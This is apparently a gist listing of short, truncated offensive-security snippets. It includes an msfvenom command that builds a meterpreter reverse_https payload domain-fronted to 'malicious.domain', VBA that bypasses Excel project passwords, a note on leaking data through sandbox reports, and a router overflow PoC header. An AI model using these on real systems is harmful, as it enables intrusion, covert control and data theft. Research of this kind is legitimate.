This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#example: "file.to.be.(en|de)crypted" | enxor -Secret ΣΕΚΡΕΤ | |
Function enxor { | |
Param ( | |
[Parameter(Mandatory=$True,ValueFromPipeline=$True, ParameterSetName="p1", position=0)] | |
[System.IO.FileSystemInfo]$File, | |
[Parameter(Mandatory=$True,ValueFromPipeline=$True, ParameterSetName="p2", position=0)] | |
[string]$FilePath, | |
[int]$Batch = 102400, |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
${msfvenom} -p windows/meterpreter/reverse_https LHOST=amazon.co.uk LPORT=443 HttpHostHeader=malicious.domain -f psh-cmd -o rev.cmd | |
MSFVenom-Info -Name rev.cmd | |
Output: | |
amazon.co.uk:443 | |
Host: malicious.domain | |
#> | |
Function Find-Pattern { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'Originally posted at: https://stackoverflow.com/questions/1026483/is-there-a-way-to-crack-the-password-on-an-excel-vba-project/53358962#53358962 | |
'This version should work for both x86 and amd64 versions of Microsoft Office | |
Option Explicit | |
Private Const PAGE_EXECUTE_READWRITE = &H40 | |
Private Declare PtrSafe Sub MoveMemory Lib "kernel32" Alias "RtlMoveMemory" _ | |
(Destination As LongPtr, Source As LongPtr, ByVal Length As LongPtr) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'Note: this "issue" was reported to checkpoint back in June/2018. | |
'This is mostly a reverse_https payload generated through msfvenom. | |
'It's modified on execution time to embed information (in base64 form) about the running environment in the domain used for the reverse | |
'connection. | |
'When the document is analysed, we should get back a report showing the "malicious" url that the document attempted to connect, which | |
'includes our encoded data. Some other potential avenues for data exfiltration are file and registry modifications which are normally | |
'included in the document analysis report. | |
'Note: Simple dns queries/http requests even though they are detected, the domain is not displayed in the report. I haven't spent any | |
'more time on this but I guess the payload has to be properly dressed/execute specific actions before getting back the full details | |
'of its behavior from the report |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
frontable_domain=${1:-www.amazon.co.uk} | |
fronted_domain=${2:-your.cloudfront.net} | |
cert_path="ssl cert path" | |
cdn_port=443 | |
local_port=443 | |
echo "Frontable domain: $frontable_domain, Fronted: $fronted_domain" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''' | |
A poc for a device having the ScriptExecute buffer overflow originally reported by: | |
https://www.redteam-pentesting.de/en/advisories/rt-sa-2015-001/-avm-fritz-box-remote-code-execution-via-buffer-overflow | |
As suggested in the above advisory, parts of the source code of the vulnerable application can be found at: | |
https://github.com/mirror/dd-wrt/tree/master/src/router/dsl_cpe_control | |
Nevertheless, in the above repository there is an imposed maximum length on the user input, which mitigates the | |
vulnerability in the unsafe sscanf call. | |
This poc targets the variation without the user input length limitations. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
babeljs plugin that unravels a number of common obfuscation patterns (originally found in F5 JS obfuscation library). | |
tip: for better results you can feed the output of the below plugin to minify | |
usage: set the plugins in your .babelrc to the path of this script | |
What it does, it gets as input the following obfuscated code: | |
function toBeGone(s, u, m){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
: ' | |
examples: | |
./ip_range_check.sh <(echo 1.1.1.1) <(echo 1.1.1.2) | |
#no results | |
./ip_range_check.sh <(echo -e '127.0/8\n1.1.1.1/31') <(echo -e '7f000001.7f000002.rbndr.us\n1.1.256\n1.1.1.2\n2.2.2.36') | |
#7f000001.7f000002.rbndr.us 127.0.0.1 | |
#1.1.256 1.1.256 | |
' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#not sure how useful If-Modified-Since/If-Unmodified-Since would be if Last-Modified header is not available:) | |
resource=${1?Missing the URL of the resource} | |
accuracy=${2:-2} #by default, tries to identify the first 2 most significant metrics, the year and month | |
function replacer { | |
local result i pattern replacement | |
result=$1 |
OlderNewer